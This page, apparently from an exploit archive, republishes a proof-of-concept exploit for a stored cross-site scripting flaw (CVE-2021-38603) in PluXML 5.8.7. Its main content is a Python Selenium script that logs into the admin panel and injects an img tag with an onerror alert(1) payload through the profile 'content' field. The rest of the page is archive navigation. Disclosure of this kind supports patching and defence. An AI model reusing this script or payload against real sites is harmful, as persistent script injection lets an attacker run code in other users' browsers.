PluXML 5.8.7 Cross Site Scripting

PluXML 5.8.7 Cross Site Scripting: Posted Aug 13, 2021; Authored by nu11secur1ty; PluXML version 5.8.7 suffers from a persistent cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2021-38603; SHA-256 | 54990585b9bccec56f64c839b836fe6765dc931c23ca4c89ce1a18c08f9938cc; Download | Favorite | View

PluXML 5.8.7 Cross Site Scripting

# Exploit Title: XSS-Stored on PluXML 5.8.7 - latest parameter "id_content"
# Author: nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 08.13.2021
# Link: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-38603/pluxml-latest.zip
# CVE: CVE-2021-38603

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-2021-38603

from selenium import webdriver
import time


#enter the link to the website you want to automate login.
website_link="
http://192.168.1.120/PluXml/core/admin/auth.php?p=/PluXml/core/admin/"

#enter your login username
username="nu11"

#enter your login password
password="password"

#enter the element for username input field
element_for_username="login"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="blue"

browser = webdriver.Chrome()
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_class_name(element_for_submit)
signInButton.click()

## Vulnerability parameter in profil.php "id_content"
## NOTE: The same problem is in the demo account in the online version
## https://www.softaculous.com/softaculous/demos/PluXml
time.sleep(3)
browser.maximize_window()
browser.get(("http://192.168.1.120/PluXml/core/admin/profil.php"))


## The Exploit
browser.execute_script("document.querySelector('[name=\"content\"]').value=\"</span><img
src=
https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif
<a href=http://example.com/> onerror=alert(1) /><span>\"")

## submit the exploit
browser.execute_script("document.querySelector('[name=\"profil\"]').click()")

# exit if you want :D
browser.close()

print("The payload for CVE CVE-2021-38603 is deployed...\n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")


----------------------------------------------------------------------------------------

# Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38603
# Proof: https://streamable.com/5rf36u
# BR nu11secur1ty

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

PluXML 5.8.7 Cross Site Scripting

PluXML 5.8.7 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PluXML 5.8.7 Cross Site Scripting

Share This

PluXML 5.8.7 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems